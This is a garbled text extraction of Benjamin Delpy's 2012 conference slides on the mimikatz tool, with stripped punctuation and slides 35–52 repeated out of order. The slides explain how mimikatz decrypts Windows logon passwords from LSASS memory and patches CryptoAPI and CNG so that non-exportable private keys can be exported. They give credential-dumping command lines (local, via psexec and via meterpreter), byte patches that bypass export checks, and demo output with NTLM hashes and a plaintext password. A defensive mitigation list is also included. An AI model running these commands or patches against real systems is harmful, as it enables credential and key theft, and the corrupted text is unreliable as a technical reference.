DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
